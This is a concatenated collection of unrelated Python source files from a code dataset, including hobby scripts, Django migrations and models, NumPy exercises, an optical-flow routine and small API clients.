text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
# End Node A runtime using I2C and MCP230.
# Jimmy Lamont 2017
# Make sure you enter your API Key, state, city (TWICE!) and Vera IP where annotated
#
#
import time
import requests
import Adafruit_CharLCD as LCD
from Adafruit_CharLCD import Adafruit_CharLCD
from subprocess import *
from time import sleep, strftime
from datetime import datetime
# Initialize the LCD using the pins
lcd = LCD.Adafruit_CharLCDPlate()
# create some custom characters
lcd.create_char(1, [2, 3, 2, 2, 14, 30, 12, 0])
lcd.create_char(2, [0, 1, 3, 22, 28, 8, 0, 0])
lcd.create_char(3, [0, 14, 21, 23, 17, 14, 0, 0])
lcd.create_char(4, [31, 17, 10, 4, 10, 17, 31, 0])
lcd.create_char(5, [8, 12, 10, 9, 10, 12, 8, 0])
lcd.create_char(6, [2, 6, 10, 18, 10, 6, 2, 0])
lcd.create_char(7, [31, 17, 21, 21, 21, 21, 17, 31])
p = Popen('hostname -I', shell=True, stdout=PIPE)
IP = p.communicate()[0]
# Show button state.
lcd.clear()
lcd.message('\n Hello')
time.sleep(3.0)
#Show version and name
lcd.clear()
lcd.message(' Vera \n endnode1')
time.sleep(2.0)
lcd.clear()
lcd.blink(True)
lcd.message('\n15NOV2017 v0.03')
time.sleep(2.0)
lcd.clear()
lcd.message(IP)
time.sleep(2.0)
#Start complete, select any mode, wait\
lcd.show_cursor(False)
lcd.blink(False)
lcd.clear()
lcd.message('\n Select mode')
time.sleep(2.0)
url = 'http://<Vera IP>:3480/data_request?id=lu_action&serviceId=urn:micasaverde-com:serviceId:HomeAutomationGateway1&action=SetHouseMode&Mode={}'
r = requests.get('http://api.wunderground.com/api/<API Key>/conditions/q/<State>/<City>.json')
data = r.json()
# Make list of button values, text, backlight colour, and luup call.
buttons = ( (LCD.SELECT, '\n Home', (1,1,1), 1),
(LCD.LEFT, '\n Panic' , (1,0,0), 5),
(LCD.UP, '\n Night' , (0,0,1), 3),
(LCD.DOWN, '\n Away' , (0,1,0), 2),
(LCD.RIGHT, '\n Vacation' , (1,0,1), 4) )
# Bringing it all back
lastmessage = ""
while True:
# Loop through each button and check if it is pressed.
for button in buttons:
if lcd.is_pressed(button[0]):
# Button is pressed, change the message and backlight.
r = requests.get(url.format(button[3]))
if r.status_code==200:
if 'ok' in r.text.lower():
lcd.clear()
lcd.message(button[1])
lastmessage = button[1]
lcd.set_color(button[2][0], button[2][1], button[2][2])
#Check to see if we can get an http 200 message from vera
else:
lcd.clear()
lastmessage = 'Vera Response not OK'
lcd.message(lastmessage)
#rut roh raggy print that something went wrong
else:
lcd.clear()
lastmessage = 'No 200 response \nfrom Vera'
lcd.message(lastmessage)
time.sleep(10.0)
#Show Clock wunderground data while waiting for input
if time.mktime(time.gmtime()) % 28800 == 0:
r = requests.get('http://api.wunderground.com/api/<API Key>/conditions/q/<State>/<City>.json')
data = r.json()
now = "{}\n{}".format(datetime.now().strftime('%b %d %H:%M'), data['current_observation']['temperature_string'])
if lastmessage != now:
lcd.clear()
lcd.set_backlight(0)
lcd.message (now)
lastmessage = now
|
consultN = int(input())
scheduled = []
for _ in range(consultN):
time = input().split(' ')
scheduled.append((int(time[1]), int(time[0])))
scheduled.sort()
max = 1
current = 0
for next in range(consultN)[1:]:
if scheduled[next][1] >= scheduled[current][0]: # if the next begins after I'm done
current = next
max += 1
print(max)
|
#*_* coding=utf8 *_*
#!/usr/bin/env python
# 内部的异常
class InvalidEnum(Exception):
code = 1003
message = "Deny access"
# 用于内部传播的异常
class UnrealException(Exception):
""" 异常基类 """
message = "An unknown exception occurred."
code = 1000
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if 'code' not in self.kwargs:
try:
self.kwargs['code'] = self.code
except AttributeError:
pass
if not message:
try:
message = self.message % kwargs
except Exception:
message = self.message
super(UnrealException, self).__init__(message)
class LoopRequestException(UnrealException):
code = 1001
message = "Not allow loop request self."
class PromptRedirect(UnrealException):
code = 1002
message = "Display msg on error msg and redirect to uri"
def __init__(self, msg, uri=None):
self.msg = msg
self.uri = uri
class DenyAccess(UnrealException):
code = 1003
message = "Deny access"
|
#!/usr/bin/python
# Copyright 2010-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import os
import sys
sys.path.insert(0, os.environ['PORTAGE_PYM_PATH'])
import portage
portage._disable_legacy_globals()
def main(args):
if args and isinstance(args[0], bytes):
for i, x in enumerate(args):
args[i] = portage._unicode_decode(x, errors='strict')
# Make locks quiet since unintended locking messages displayed on
# stdout would corrupt the intended output of this program.
portage.locks._quiet = True
lock_obj = portage.locks.lockfile(args[0], wantnewlockfile=True)
sys.stdout.write('\0')
sys.stdout.flush()
sys.stdin.read(1)
portage.locks.unlockfile(lock_obj)
return portage.os.EX_OK
if __name__ == "__main__":
rval = main(sys.argv[1:])
sys.exit(rval)
|
# encoding:utf-8
#!/usr/bin/python
#-*-coding:utf-8-*-
import MySQLdb
db = MySQLdb.connect(host="localhost",user="root",passwd="4242",\
db="coolSignIn",charset="utf8",use_unicode=True)
cursor = db.cursor()
data = [82,"软工10"]
length = 20
for i in xrange(length):
data[0] += i
data[1] = data[1] + str(i)
sql ="insert into StudentSheet(uid,sheetName)\
values('%d','%s')" % tuple(data)
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
data[0] = 82
data[1] = "软工10"
db.close()
|
from test_utils import MockRequestResponse, TestPlatformClient
class TestDeleteConverstaion(TestPlatformClient):
def test_delete_conversation(self, layerclient, monkeypatch):
def verify_request_args(method, url, headers, data, params):
assert method == "DELETE"
assert url == (
"https://api.layer.com/apps/TEST_APP_UUID/"
"conversations/TEST_CONVERSATION_UUID"
)
assert headers == {
'Accept': 'application/vnd.layer+json; version=1.0',
'Authorization': 'Bearer TEST_BEARER_TOKEN',
'Content-Type': 'application/json',
}
assert data is None
return MockRequestResponse(True, {})
monkeypatch.setattr("requests.request", verify_request_args)
layerclient.delete_conversation('TEST_CONVERSATION_UUID')
|
from random import uniform
x=[[1,1,1,1,1,-1,-1,1,-1,-1,-1,-1,1,-1,-1,-1,-1,1,-1,-1,-1,-1,1,-1,-1],
[1,-1,-1,-1,1,-1,1,-1,1,-1,-1,-1,1,-1,-1,-1,1,-1,1,-1,1,-1,-1,-1,1]]
t=[1,-1]
alfa=0.1;
bold=uniform(-0.5, 0.5);
wold=[uniform(-0.5, 0.5),uniform(-0.5, 0.5)]
wnew=wold;
bnew=bold;
flag=0;
errtotal=0
errant=0
y_in=0
y=0
while (errtotal-errant)>0.0000001:
flag+=1
errant=errtotal;
for k in x:
for p in range(0,2):
for i in range(0,len(k)):
y_in=k[i]*wold[p]+bold
y=y_in;
errtotal+=0.5*(t[p] - y)*(t[p] - y);
wold[p]+= alfa*(t[p]-y)*k[i];
bold+=alfa*(t[p]-y);
print(wold)
print(bold)
print(wnew)
print(bnew)
def neu(x):
y=0
y_in=0
for k in x:
for p in range(0,1):
for i in range(0,len(k)):
y_in=k[i]*wold[p]+bold
y=y_in;
if y>=0:
print(1)
else:
print(-1)
neu(x)
|
import webapp2
from emailsender import EmailSender
from review import ReviewHandler
from new import NewHandler
app = webapp2.WSGIApplication([
('/', ReviewHandler),
('/nuevo', NewHandler)
], debug=True)
|
def solution(s):
# Your code here
ans = 0
for i in range(len(s)):
if(s[i]=='>'):
for j in range(i+1,len(s)):
if(s[j]=='<'):
ans+=1
return ans*2
print(solution("<<>><")) |
# Generated by Django 2.1.2 on 2018-11-27 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('datawarehouse', '0008_auto_20181110_1606'),
]
operations = [
migrations.AddField(
model_name='mahasiswa',
name='temp_cuti',
field=models.NullBooleanField(),
),
]
|
from tools.primes import prime_factors_of, primes_under, is_prime
from tools.collections import mil_primes, mil_primes_dict
from more_itertools import consecutive_groups
import numpy as np
quad_prime_factors = []
for hd in range(50):
print(hd * 100000 , "reached")
for n in range(hd * 100000, (hd + 1) * 100000):
factors = prime_factors_of(n)
if len(factors) > 3:
quad_prime_factors.append(n)
cqpf = [list(item) for item in consecutive_groups(quad_prime_factors)]
cqpf = [i for i in cqpf if len(i) > 3]
if len(cqpf):
print(cqpf)
break
else:
quad_prime_factors = quad_prime_factors[-5:]
|
# Generated by Django 2.2.11 on 2020-03-13 18:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orgchart', '0005_auto_20200313_1358'),
]
operations = [
migrations.AddField(
model_name='detail',
name='department',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='detail',
name='employments_url',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='detail',
name='location',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='detail',
name='manager',
field=models.CharField(max_length=40, null=True),
),
migrations.AddField(
model_name='detail',
name='subordinates_url',
field=models.TextField(null=True),
),
migrations.AlterField(
model_name='detail',
name='emp_id',
field=models.IntegerField(unique=True),
),
migrations.AlterField(
model_name='detail',
name='personal_email',
field=models.CharField(max_length=50),
),
]
|
# Generated by Django 2.2.4 on 2019-08-28 07:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('whiskydatabase', '0024_bar'),
]
operations = [
migrations.AlterField(
model_name='bar',
name='lat',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='bar',
name='lon',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='distillery',
name='lat',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='distillery',
name='lon',
field=models.FloatField(blank=True, null=True),
),
]
|
#odd or even from 1-100
'''
####method: 1
myOddList=[]
myEvenList=[]
for i in range(1,101):
if(i%2==0):
print("even = {0}".format(i))
elif(i%2==1):
print("odd = {0}".format(i))
'''
###Method 2:
myOddList=[]
myEvenList=[]
for i in range(1,101):
if(i%2==0):
myEvenList.append(i)
elif(i%2==1):
myOddList.append(i)
print("Odd number from 1 - 100 are: ",myOddList)
print()
print("Even number from 1 - 100 are: ",myEvenList)
|
"""
Wrapper for the managment teams device manager endpoints.
Nov, 27, 2016 - Pablo Caruana pablo dot caruana at gmail dot com
"""
import requests
import logging
class DeviceManager:
def __init__(self, dm_host):
self._address = dm_host.ip
self._port = dm_host.port
self.log = logging.getLogger()
def _set_state(self, state):
self.log.info('Setting state to {}'.format(state))
try:
url_str = 'http://{}:{}/set_state/component'.format(
self._address,
self._port
)
self.log.debug(url_str)
resp = requests.post(url_str, json={'state' : state})
return resp.status_code in [200, 201]
except:
self.log.exception('Failed to set state.')
return False
def alert_online(self):
"""
The Device manager needs to know that the crawler has started.
This method sends an alert to the DM, sayign that we are online.
TODO: Get request format from mgmt team.
"""
return self._set_state('online')
def send_waiting(self):
"""
In the event that there are no new seeds, we need to tell the DM that
we are waiting.
TODO: Get request format from mgmt team.
"""
return self._set_state('waiting')
def send_error(self):
"""
Tell the mgmt team that we hit a fatal error, and that we won't
continue to run.
Note: Does not take any params.
"""
return self._set_state('error')
def get_unprop_chunks(self):
"""
Requests the list of chunks which should be stored on the crawler.
Response JSON should look like:
{
"chunks": [100, 101, 102]
}
"""
resp = requests.get(
'http://{}:{}/get_chunks/unpropagated'.format(
self._address,
self._port
)
)
chunks = resp.json()['chunks']
return chunks
def alert_chunk(self, chunk_id):
"""
Alerts mgmt that we are done this the chunk corresponding to chunk_id.
param: chunk_id : String corresponding to the id of the chunk we just
finished.
param: address : Named Tuple containing our ip and the port to
contact us on.
format should be:
{
"chunk_id": 101,
"state": "crawled"
}
"""
resp = requests.post(
'http://{}:{}/set_state/content_chunk'.format(
self._address,
self._port
),
json={
'chunk_id' : chunk_id,
'state' : 'crawled'
}
)
return resp.status_code in [200, 201]
def mark_link_crawled(self,link, success):
"""
Alert's management that `link` has been crawled, and does not need to
be checked again. Uses the /add_crawled_link endpoint.
param: link : String containing the link which has been crawled.
"""
if success:
state = 'crawled'
else:
state = 'error'
resp = requests.post(
'http://{}:{}/set_state/link'.format( # formerly crawler
self._address,
self._port
),
json={'link' : link, 'state' : state}
)
|
from sys import stdin
n = int(stdin.readline())
num =[0 for _ in range(8001)]
maxi = -4001
mini = 4001
sum_tn = 0
max_bindo =0
hana = True
for i in range(n):
tn = int(stdin.readline())
sum_tn += tn
if tn < mini:
mini = tn
if tn > maxi:
maxi = tn
num[tn+4000] += 1
if max_bindo < num[tn+4000]:
max_bindo = num[tn+4000]
max_index = tn+4000
hana = True
elif max_bindo == num[tn+4000] and hana:
max_index = tn+4000
hana = False
arithmatic_average = round(sum_tn / n)
sort_num = []
for i, v in enumerate(num):
if v != 0:
for _ in range(v):
sort_num.append(i-4000)
if len(sort_num) == n:
break
median_value = sort_num[n>>1]
if hana:
cheobin_value = max_index - 4000
else:
c=0
for i in range(8001):
if num[i] == max_bindo:
if c == 1:
cheobin_value = i - 4000
break
c+=1
bomui = maxi - mini
print(arithmatic_average, median_value, cheobin_value, bomui, sep='\n', end='') |
# coding: utf-8
# In[2]:
import numpy as np
TwoD = np.array([[2,3,8],[3,4,6],[2,4,6]])
print(TwoD)
print(TwoD[0][0])
print(TwoD[2][1])
print(TwoD[2,2])
print(TwoD[:2])
print(TwoD[:2,0:1])
# In[3]:
new = np.arange(0,10)
slice_of_array=new[0:6]
print(slice_of_array)
slice_of_array[:]=99
print(slice_of_array)
new2 = new.copy()
print(new2)
# In[5]:
lohit=np.arange(1,11)
lohit
bool_arr=lohit>4
bool_arr
# In[10]:
lohit[bool_arr]
# In[11]:
arr = np.arange(25)
ranarr=np.random.randint(0,50,10)
ranarr
arr
# In[12]:
arr[arr<5]
# In[13]:
from numpy.random import randint
# In[14]:
randint(3,22)
# In[15]:
arr_2d=np.arange(40).reshape(4,10)
arr_2d
# In[16]:
import numpy as np
new_array = np.arange(0,11)
new_array
# In[17]:
new_array+new_array
# In[18]:
new_array-new_array
# In[19]:
new_array*new_array
# In[20]:
new_array/new_array
# In[21]:
new=new_array+1000
new
# In[22]:
new = new_array*10
new
# In[23]:
new=new/12
new
# In[25]:
new_array=np.arange(1,10)
new=new_array+new_array
new
n=new/10
n
# In[26]:
ok=np.arange(3,10)
ok
# In[27]:
np.sqrt(ok)
# In[28]:
np.max(ok)
# In[29]:
np.min(ok)
# In[30]:
np.sin(ok)
# In[32]:
np.log(ok)
# In[34]:
log_number=np.arange(0,3)
print(np.log(log_number))
# In[96]:
n=np.zeros(10)
n
# In[105]:
n+5
# In[106]:
np.ones(10)*5
# In[112]:
N= (np.arange(100).reshape(10,10)+1)/100
N
# In[113]:
np.arange(1,101).reshape(10,10)/100
# In[100]:
np.linspace(0,1,20)
# In[42]:
np.arange(10,51)
# In[108]:
np.arange(9).reshape(3,3)
# In[109]:
np.eye(3)
# In[110]:
np.random.rand()
# In[111]:
np.linspace(0,50,200)
# In[46]:
np.random.randn(25)
# In[107]:
np.arange(10,51,2)
# In[114]:
n = np.arange(25).reshape(5,5)+1
n
# In[117]:
n = np.arange(1,26).reshape(5,5)
n
# In[118]:
print(n[2:,1:])
# In[77]:
np.sum(n)
# In[80]:
print(n[4:5])
# In[78]:
print(n[3:5])
# In[116]:
# In[62]:
np.array([[12,13,14,15],[17,18,19,20],[22,23,24,25]])
# In[85]:
np.array(n[0:3,1:2])
# In[104]:
np.sqrt(52)
# In[103]:
np.arange(11,16)*5
|
import pickle
import os
from datetime import datetime
def get_pickle_file_content(full_path_pickle_file):
pickle_file = open(full_path_pickle_file,'rb')
pickle_list = pickle.load(pickle_file, encoding='latin1')
pickle_file.close()
return pickle_list
def get_all_pickle_filenames(pickle_file_dir):
files = os.listdir(pickle_file_dir)
tar_files = list()
for f in files:
if f.endswith(".pickle"):
tar_files.append(f)
return tar_files
def save_vocab_size(full_path_vocab_file, vocab_size):
file = open(full_path_vocab_file,'w+')
file.write(str(vocab_size))
file.close()
def save_sequence_length(full_path_seq_file, biggest):
file = open(full_path_seq_file,'w+')
file.write(str(biggest))
file.close()
def build_vocab_dict_from_set(vocab_set):
vocab_dict = dict()
c = 1
for w in vocab_set:
vocab_dict[w] = c
c += 1
return vocab_dict
def save_vocab(full_path_vocabfile, unique_vocab):
pickle_file = open(full_path_vocabfile,'wb+')
pickle.dump(unique_vocab, pickle_file)
pickle_file.close()
def main():
start=datetime.now()
bag_styled_file_dir = "/tmp/savetest"
full_path_vocab_file = "/tmp/vocab_size.txt"
full_path_seq_file = "/tmp/sequence_length.txt"
full_path_vocabfile = "/tmp/vocab.pickle"
unique_vocab = set()
print(f'Read out all tokenized pickle files in >{bag_styled_file_dir}<')
all_files = get_all_pickle_filenames(bag_styled_file_dir)
if len(all_files) == 0:
print(f'Error: No tokenized files in dir >{bag_styled_file_dir}<')
exit()
counter = 0
biggest = 0
longest_disas = 30000
shortest_disas = 50
len_all_files = len(all_files)
len_all_files_counter = 1
for file in all_files:
content = get_pickle_file_content(bag_styled_file_dir + '/' + file)
print(f'Building vocab from file nr >{len_all_files_counter}/{len_all_files}<', end='\r')
len_all_files_counter += 1
for disas,ret_type in content:
#print(f'len disas >{len(disas)}<')
### we filter out some
if (len(disas) <= longest_disas) and ( len(disas) >= shortest_disas):
for disas_item in disas.split():
unique_vocab.add(disas_item)
if len(disas) > biggest:
biggest = len(disas)
#break
stop = datetime.now()
#vocab_dict = build_vocab_dict_from_set(unique_vocab)
print(f'Run took:{stop-start} Hour:Min:Sec')
print(f'We save Vocabulary in file >{full_path_vocab_file}<')
print(f'Vocab size is >{len(unique_vocab)}<')
print(f'Biggest sequence length is >{biggest}<')
save_vocab(full_path_vocabfile, unique_vocab)
save_vocab_size(full_path_vocab_file, len(unique_vocab))
save_sequence_length(full_path_seq_file, biggest)
print(unique_vocab)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to parse utmp files."""
import argparse
import logging
import os
import sys
from dtformats import output_writers
from dtformats import utmp
def Main():
"""The main program function.
Returns:
bool: True if successful or False if not.
"""
argument_parser = argparse.ArgumentParser(description=(
'Extracts information from utmp files.'))
argument_parser.add_argument(
'-d', '--debug', dest='debug', action='store_true', default=False,
help='enable debug output.')
argument_parser.add_argument(
'source', nargs='?', action='store', metavar='PATH',
default=None, help='path of the utmp file.')
options = argument_parser.parse_args()
if not options.source:
print('Source file missing.')
print('')
argument_parser.print_help()
print('')
return False
logging.basicConfig(
level=logging.INFO, format='[%(levelname)s] %(message)s')
output_writer = output_writers.StdoutWriter()
try:
output_writer.Open()
except IOError as exception:
print(f'Unable to open output writer with error: {exception!s}')
print('')
return False
with open(options.source, 'rb') as file_object:
file_object.seek(0, os.SEEK_SET)
utmp_signature = file_object.read(11)
if utmp_signature == b'utmpx-1.00\x00':
utmp_file = utmp.MacOSXUtmpxFile(
debug=options.debug, output_writer=output_writer)
else:
utmp_file = utmp.LinuxLibc6UtmpFile(
debug=options.debug, output_writer=output_writer)
utmp_file.Open(options.source)
output_writer.WriteText('utmp information:')
utmp_file.Close()
output_writer.WriteText('')
output_writer.Close()
return True
if __name__ == '__main__':
if not Main():
sys.exit(1)
else:
sys.exit(0)
|
import os
module_path = os.path.dirname(__file__) # needed because sample data files are located in the same folder
def datapath(fname=None):
if not fname:
return os.path.join(module_path, 'testdata')
return os.path.join(module_path, 'testdata', fname)
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
Builder.load_file('KV/tri.kv')
class Try(BoxLayout):
def __init__(self, **kwargs):
super(Try, self).__init__(**kwargs)
self.ids.cb_chronic_cough.active = True
# def fun(self):
# print(self.ids.cb_chronic_cough.active)
pass
class Main2(App):
def build(self):
return Try()
Main2().run() |
# 6. Write a Python program which accepts
# a sequence of comma-separated numbers
# from user and generate a list
# and a tuple with those numbers.
# Sample data : 3, 5, 7, 23
# Output :
# List : ['3', ' 5', ' 7', ' 23']
# Tuple : ('3', ' 5', ' 7', ' 23')
inp_str: str =\
input('Write a sequence of'
'\n comma-separated numbers: ')
x = inp_str.split(',')
print(f'List: {x}')
print(f'Tuple: {tuple(x)}')
|
# Szymon Romanowski projekt PJF - tamagotchi
#-------------------------------------------------------------------------------------------------
# MAIN -------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------
import pygame
import random
from Menu import Menu
from Pet import Pet
from Display import Display
# Main game logic
def main():
pygame.init()
screen = Display()
tamagotchi = Pet(screen.display)
menu = Menu(tamagotchi, screen.display)
frameCount = 0
screen.display.fill((255, 255, 255))
screen.update()
menu.displayButtons()
running = True
# GAME LOOP
while running:
# EVENTS HANDLING
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = event.pos
# reset
if ((500 <= x <= 600) and (600 <= y <= 700)):
pygame.draw.rect(screen.display, (255, 255, 255), (0, 100, 700, 500))
tamagotchi = Pet(screen.display)
menu.tamagotchi = tamagotchi
print("RESET")
menu.handleMouse(x,y)
# POOPING
if frameCount % 1000 == 999:
rand = random.randint(0, 2)
if rand == 1:
tamagotchi.poop()
# LOWERING HYGIENE
if tamagotchi.pooCounter > 0:
if frameCount % 50 == 0:
if tamagotchi.hygiene < 30:
tamagotchi.ill = 1
if tamagotchi.hygiene <= 0:
tamagotchi.hygiene = 0
else:
tamagotchi.hygiene -= 1 * tamagotchi.pooCounter
# HUNGER (LOWERING FOOD)
if frameCount % 70 == 0:
if(tamagotchi.food > 0):
tamagotchi.food -= 1
else:
tamagotchi.food = 0
if(tamagotchi.food < 20):
tamagotchi.health -= 1
# BOREDOM (LOWERING HAPPINESS)
if frameCount % 80 == 0:
if tamagotchi.happiness > 0:
tamagotchi.happiness -= 1
else:
tamagotchi.happiness = 0
# ILLNESS
if tamagotchi.ill == 1:
screen.blit(tamagotchi.illness, (80, 200))
pygame.display.update((80, 200), (120, 120))
if frameCount % 100 == 0:
tamagotchi.health -= 1
# HEALTH
if tamagotchi.health < 0:
tamagotchi.health = 0
# DEATH
if tamagotchi.health <= 0:
if tamagotchi.death == 0:
tamagotchi.animationFrame = 0
tamagotchi.currentAnimation = "death"
tamagotchi.death = 1
# PRINT TAMAGOTCHI VARIABLES
if frameCount % 20 == 0:
print("energy:"+str(tamagotchi.energy))
print("food:"+str(tamagotchi.food))
print("happiness:"+str(tamagotchi.happiness))
print("hygiene:"+str(tamagotchi.hygiene))
print("health:"+str(tamagotchi.health))
print("sad:"+str(tamagotchi.sad))
print("ill:"+str(tamagotchi.ill))
print("death:"+str(tamagotchi.death))
# DISPLAYING TAMAGOTCHI ANIMATIONS
tamagotchi.animate()
frameCount += 1
screen.fpsClock.tick(screen.FPS)
main()
pygame.quit() |
import cv2
import numpy as np
from src.image.utils import derivative_hs
# TODO add clipping
class HornSchunkFrame():
def __init__(self, alpha, num_iter):
self.alpha = alpha
self.num_iter = num_iter
def compute_derivatives(self, anchor, target):
i_x = derivative_hs(img1=anchor, img2=target, direction='x')
i_y = derivative_hs(img1=anchor, img2=target, direction='y')
i_t = derivative_hs(img1=anchor, img2=target, direction='t')
return i_x, i_y, i_t
def weighted_average(self, frame):
filter = np.array([[1, 2, 1],
[2, 4, 2],
[1, 2, 1]]) / 16
return cv2.filter2D(src=frame, kernel=filter, ddepth=-1)
def __call__(self, anchor, target):
if type(anchor) is not np.ndarray:
raise Exception("Please input a numpy nd array")
if type(target) is not np.ndarray:
raise Exception("Please input a numpy nd array")
assert anchor.shape == target.shape, "Frame shapes do not match"
assert len(anchor.shape) == 2, "Frames should be gray"
u_k = np.zeros_like(anchor)
v_k = np.zeros_like(anchor)
i_x, i_y, i_t = self.compute_derivatives(anchor, target)
for iteration in range(self.num_iter):
u_avg = self.weighted_average(u_k)
v_avg = self.weighted_average(v_k)
numerator = i_x * u_avg + i_y * v_avg + i_t
denominator = self.alpha ** 2 + i_x ** 2 + i_y ** 2
u_k = u_avg - i_x * (numerator / denominator)
v_k = v_avg - i_y * (numerator / denominator)
u_k[np.isnan(u_k)] = 0
v_k[np.isnan(v_k)] = 0
return u_k, v_k
def reconstruct(anchor, u, v):
assert u.shape == v.shape
height, width = u.shape
reconstructed_img = np.zeros_like(u)
for h in range(height):
for w in range(width):
new_h = int(h + u[h, w])
new_w = int(w + v[h, w])
new_h = max(new_h, 0)
new_h = min(new_h, height - 1)
new_w = max(new_w, 0)
new_w = min(new_w, width - 1)
reconstructed_img[new_h, new_w] = anchor[h, w]
return reconstructed_img
|
from django.db.models import Model, IntegerChoices, CASCADE, ForeignKey, IntegerField, BinaryField, TextField, \
FileField, URLField
from .core import RecordedUser
from django.utils.translation import gettext_lazy as _
# Create your models here.
class InstantContent(Model):
"""
The content that can be easily previewed and transmitted:
contentType: IntegerField
1: 'text & image'([pure text] OR [pure image] OR [text + image])
2: 'location'
3: 'voice'
content: BinaryField
binary version of the content, it should contain all the information of the InstantContent
compressionMethod: CharField
1: 'gzip'
textVersionContent: TextField
text version of the content, the value should be:
if the type is pure text:
the original pure text
if the type is pure image:
blank
if the type is text + image:
only the text content
if the type is location:
GPS: (xxx.xxx,yyy.yyy,zzz.zzz)
Location: provided by the user or Google API
if the type is voice:
the converted text content
"""
class ContentType(IntegerChoices):
TYPE_TEXT_IMAGE = 1, _("Text & Image")
TYPE_LOCATION = 2, _("Location")
TYPE_VOICE = 3, _("Voice")
class CompressionMethod(IntegerChoices):
TYPE_GZIP = 1, _("gzip")
user = ForeignKey(to=RecordedUser, on_delete=CASCADE,null=True)
contentType = IntegerField(choices=ContentType.choices,null=True)
content = BinaryField(null=True)
compressionMethod = IntegerField(choices=CompressionMethod.choices, null=True)
textVersionContent = TextField(null=True)
def _str_(self):
return self.title
class InstantContentDraft(InstantContent):
"""
same as above, but not finished yet, no textVersionContent needed
"""
pass
class File(Model):
"""
uploadAs: FileField
the file should be uploaded to "files/$uid/finished/$fileName"
downloadUrl: UrlField
the url to directly download the file
"""
uploadAs = FileField(null=True)
downloadUrl = URLField(null=True)
class UploadingFile(Model):
"""
uploadingDir: FileField
the file should be uploaded as "files/$uid/$filePathAbove/$count"
"""
uploadingDir = FileField(null=True)
|
def drawTriangle(t,p1,p2,p3):
t.up()
t.goto(p1)
t.down()
t.goto(p2)
t.goto(p3)
t.goto(p1)
def midPoint(p1,p2):
return((p1[0]+p2[0])/2.0,(p1[1]+p2[1])/2.0)
def sierpinski(myturtle,p1,p2,p3,depth):
if depth>0:
sierpinski(myturtle,p1,midPoint(p1,p2),midPoint(p1,p3),depth-1,)
sierpinski(myturtle,p2,midPoint(p2,p3),midPoint(p2,p1),depth-1,)
sierpinski(myturtle,p3,midPoint(p3,p1),midPoint(p3,p2),depth-1,)
else:
drawTriangle(myturtle,p1,p2,p3)
from cTurtle import *
t=Turtle()
sierpinski(t,(0,0),(100,0),(100,100),4)
|
import unittest
from katas.kyu_6.english_to_enigeliisohe import toexuto
class ToexutoTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(toexuto('little'), 'liitotolie')
def test_equals_2(self):
self.assertEqual(toexuto('BIG'), 'BaIGe')
def test_equals_3(self):
self.assertEqual(toexuto(
'This is a test. This is only a test.'),
'Toheiso iso a toesoto. Toheiso iso oniliyu a toesoto.')
|
import unittest
from katas.kyu_7.credit_card_mask import maskify
class MaskifyTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(maskify('4556364607935616'), '############5616')
def test_equals_2(self):
self.assertEqual(maskify('64607935616'), '#######5616')
def test_equals_3(self):
self.assertEqual(maskify('1'), '1')
def test_equals_4(self):
self.assertEqual(maskify(''), '')
|
# coding=utf8
import model
from sqlalchemy import or_
import tornado.web
import requests
import re, json, os, traceback
class BaseHelper(tornado.web.RequestHandler):
#_cache_query_all = {}
def initialize(self):
self.model = self.application.model
self.db = self.application.model.session
def on_finish(self):
self.db.close()
def update_obj(self, obj, data, commit=False):
for key in data:
hasattr(obj, key) and setattr(obj, key, data.get(key))
commit and self.db.commit()
def delete_objs(self, objs, commit=False):
for obj in objs:
self.db.delete(obj)
commit and self.db.commit()
def model2dict(self, model_obj, columns=None, ignore=[]):
columns = columns is None and (column.name for column in model_obj.__table__.columns if column not in ignore) or columns
return dict(((column, getattr(model_obj, column)) for column in columns))
#def cache_query_all(self, model, certain={}):
#if model in self._cache_query_all:
#cache_certain = self._cache_query_all[model]['certain']
#if len(certain)==len(cache_certain):
#dissimilar = 0
#for key in certain:
#if key not in cache_certain or certain[key]!=cache_certain[key]: dissimilar+=1
#if not dissimilar: return self._cache_query_all[model]['data']
#data = self.db.query(model).filter_by(**certain).all()
#self._cache_query_all[model] = {'certain': certain, 'data': data}
#print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>create')
#return data
#def clear_cache_query(self, models=[]):
#if models:
#for model in models:
#if model in self._cache_query: del self._cache_query[model]
#else:
#self._cache_query.clear()
def multi_columns_query(self, query, model, columns, keywords):
if columns and keywords:
keywords = ['%'+keyword+'%' for keyword in keywords]
keyword_certains = []
for keyword in keywords:
keyword_certains.append(or_(*[getattr(model, column).like(keyword) for column in columns]))
return query.filter(*keyword_certains)
return query
def show_page(self, template, query, per_page, *args, **kwargs):
page = int(self.get_argument('page', 1))
if page<1:
return
start_index = (page-1)*per_page
count = query.count()
if count and page>count:
return
self.render(template, *args, data=query.offset(start_index).limit(per_page), page=page, max_page=count//per_page+1, start_index=start_index+1, count=count, per_page=per_page, **kwargs)
class FetchHelper(BaseHelper):
LIST_INDEX_URL = 'http://{shop_name}.1688.com/page/offerlist.htm'
LIST_URL = 'http://{shop_name}.1688.com/page/offerlist.htm?showType=catalog&tradenumFilter=false&sampleFilter=false&mixFilter=false&privateFilter=false&mobileOfferFilter=%24mobileOfferFilter&groupFilter=false&sortType=timedown&pageNum={page}'
PRODUCT_URL = 'http://m.1688.com/offer/{offer_id}.html'
MAX_PAGE_RE = re.compile(r'<li>共<em class="page-count">(\d+)', re.S)
